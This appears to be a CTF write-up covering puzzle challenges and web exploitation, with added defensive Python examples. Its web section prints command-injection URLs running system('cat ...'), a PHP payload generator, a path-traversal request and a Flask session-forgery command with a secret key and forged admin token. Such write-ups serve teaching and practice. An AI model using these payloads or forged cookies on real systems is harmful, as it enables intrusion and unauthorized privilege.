Miscellaneous
Who Am I?
This challenge requires matching items against a provided list. While straightforward, it demands careful attention to detail as the information is spread across multiple entries. The solution involves cross-referencing each element systematically until all correspondences are established.
You and Me
Blind watermarking extraction forms the core of this challenge. The BlindWatermark tool accepts two images as input: the original image without the watermark and the image containing the hidden watermark. When both images are processed through the tool, it reconstructs and outputs the embedded blind watermark, revealing the hidden information.
7.1.05
The provided .SAV file represents a game save file. The QQ number 754365305 in the hint serves as a search key, identifying the game as "Capitalism" (金融帝国). The challenge title "7.1.05" corresponds to a specific version number of this game.
The solution path requires downloading the matching game version and loading the save file. Once inside the game environment, following the in-game instructions progressively reveals pieces of the flag.
Black Stockings, White Stockings, and Other Stockings
The challenge title hints at Morse code. The encoded string provided decodes directly using Morse code translation:
.-- ....- -. - - ----- -... ...-- -- --- .-. . -.-. ..- - .
Standard Morse code interpretation yields the flag.
I Vomited, You Do As You Please
The filename provides a clue pointing to zero-width steganography. The technique embeds information within Unicode zero-width characters (zero-width non-joiner, zero-width joiner, and word joiner). Copying the seemingly empty text and analyzing it reveals the hidden content when examined with appropriate tools or converted to reveal the invisible characters.
Rapid Response
The QR code cannot be scanned directly. QRazyBox, an advanced QR code analysis tool, provides the necessary functionality for extraction.
Load the image into QRazyBox and navigate to the Tools menu, selecting "Extract QR Information." This operation reveals the first portion of the flag.
The remaining steps require a creative approach not immediately obvious without reference material. Use the drawing tool on the left side to fill the error correction area on the left side with white. After this modification, re-running the extraction reveals the complete flag.
Final flag: ctfshow{11451419-1981-landexiangle}
Unopenable Image
A valid PNG file begins with the hexadecimal signature 89 50 4E 47. Opening the provided image in a hex editor reveals that the first four bytes have been modified. Each byte contains a value that, when added to the expected correct value, totals 100 in decimal.
This indicates the use of one's complement (bitwise NOT) operation on the PNG header bytes. Applying the same operation again to these bytes restores them to their correct values, allowing the image to open and reveal the flag.
Web Challenges
Web Check-in
The challenge requires submitting a specific payload via URL parameters and additional headers. The complete request structure follows:
https://7547cfec-75c7-476c-8109-d1400777247b.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");
POST data: a=b
Cookie: CTFshow-QQ群:=a
Note: Successful exploitation requires using Chrome's Hackbar extension. The Edge version produced inconsistent results during testing, suggesting browser-specific behavior in how the request is processed.
Only Dollar Signs in My Eyes
This challenge tests understanding of variable nesting in PHP. The solution involves constructing a query string where each parameter references another, creating a chain that ultimately executes system commands.
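<?php
// Read the challenge string; its length decides how many chained parameters are generated.
$count = strlen(readline("Enter string: "));
// Start the chain: parameter "_" holds the name a0, a0 holds a1, and so on.
$result = "_=a0";
for ($i = 0; $i < $count - 2; $i++) {
    $result .= '&a' . $i . '=' . 'a' . ($i + 1);
}
// The last parameter in the chain carries the command string.
$result .= '&a' . ($count - 2) . '=system("ls /");';
echo "Output: $result\n";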
Execute the generated payload through the POST method to enumerate files. Replace the directory listing command with cat /f* to read and obtain the flag.
Gacha Roll
Initial interaction reveals an image gallery interface, though the actual vulnerability lies elsewhere. Examining the page source exposes a suspicious endpoint: /download?file=.
Attempting to directly download flag fails. Specifying a non-existent image file like 1.png reveals that the application uses app.py for file handling. The error message exposes the path concatenation logic used in the download function.
Traversing the directory structure by setting file=../../app.py allows downloading the application source code. Analysis of app.py reveals that accessing the flag requires executing the getflag() function with a session value of 'isadmin'. The secret key used for session signing is discoverable within the application.
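The root cause on the server side is joining user input onto a directory without checking where the result lands. The following is an added example, not the challenge's app.py (which the write-up does not reproduce): resolve_naive is an assumed reconstruction of the flawed logic, the static/images directory name is hypothetical, and the files are constructed in a temporary directory.

```python
import os
import tempfile

def resolve_naive(base_dir, name):
    """Assumed shape of the flawed handler: join user input onto the image directory."""
    return os.path.normpath(os.path.join(base_dir, name))

def resolve_safe(base_dir, name):
    """Canonicalise first, then require the result to stay inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))  # collapses "..", follows symlinks
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:  # e.g. paths on different drives on Windows
        inside = False
    if not inside or not os.path.isfile(target):
        # One generic error, so no path or source-file detail reaches the client.
        raise FileNotFoundError("not found")
    return target

def demo():
    """Build a constructed layout and run sample requests through both resolvers."""
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "static", "images")  # hypothetical directory name
        os.makedirs(images)
        for path in (os.path.join(root, "app.py"), os.path.join(images, "1.png")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        # A symlink inside the image directory that points back at the source file.
        os.symlink(os.path.join(root, "app.py"), os.path.join(images, "link.png"))

        prefix = os.path.realpath(images) + os.sep
        outcome = {}
        for name in ("1.png", "../../app.py", "/etc/passwd", "link.png"):
            naive_hit = os.path.realpath(resolve_naive(images, name))
            leaks = os.path.isfile(naive_hit) and not naive_hit.startswith(prefix)
            try:
                resolve_safe(images, name)
                safe = "served"
            except FileNotFoundError:
                safe = "rejected"
            outcome[name] = (leaks, safe)
        return outcome

if __name__ == "__main__":
    for name, (leaks, safe) in demo().items():
        print(f"{name!r}: naive resolver leaves the directory={leaks}, hardened={safe}")
```

In a Flask application the same containment check is available as werkzeug.utils.safe_join or flask.send_from_directory.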
Flask session cookie forgery enables creating a valid session with administrator privileges. The flask_session_cookie_manager3 script generates the forged cookie:
python3 flask_session_cookie_manager3.py encode -t "{'isadmin':True}" -s "tanji_is_A_boy_Yooooooooooooooooooooo!"
The resulting session token: eyJpc2FkbWluIjp0cnVlfQ.ZmufEg.vF6jyYAmenDHHQ6L9EyqeaYZqTM
Submitting this cookie and accessing /secret_path_U_you_never_know retrieves the flag.
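Flask's default session cookie is signed but not encrypted, so the secret key is the only thing separating a client from the isadmin claim. The following added example (not part of the original write-up or of Flask) decodes the token quoted above without any key; it assumes the plain epoch-seconds timestamp used by current itsdangerous releases.

```python
import base64
import json
import zlib
from datetime import datetime, timezone

# Token quoted in the write-up above.
TOKEN = "eyJpc2FkbWluIjp0cnVlfQ.ZmufEg.vF6jyYAmenDHHQ6L9EyqeaYZqTM"

def b64url_decode(part):
    """Decode URL-safe base64 with the padding that the cookie format strips."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def inspect_flask_session(cookie):
    """Split a session cookie into payload, issue time and signature size.

    No secret key is involved: the payload is only protected against
    modification, not against being read.
    """
    compressed = cookie.startswith(".")  # a leading dot marks a zlib-compressed payload
    if compressed:
        cookie = cookie[1:]
    payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    raw = b64url_decode(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    issued = int.from_bytes(b64url_decode(ts_b64), "big")
    return {
        "payload": json.loads(raw),
        "issued": datetime.fromtimestamp(issued, tz=timezone.utc).isoformat(),
        "signature_bytes": len(b64url_decode(sig_b64)),  # 20 bytes for HMAC-SHA1
    }

if __name__ == "__main__":
    print(inspect_flask_session(TOKEN))
```

Because the authorization flag lives in the cookie itself, any disclosure of the application source also discloses the ability to set it; loading the key from outside the code base and rotating it after exposure closes that path.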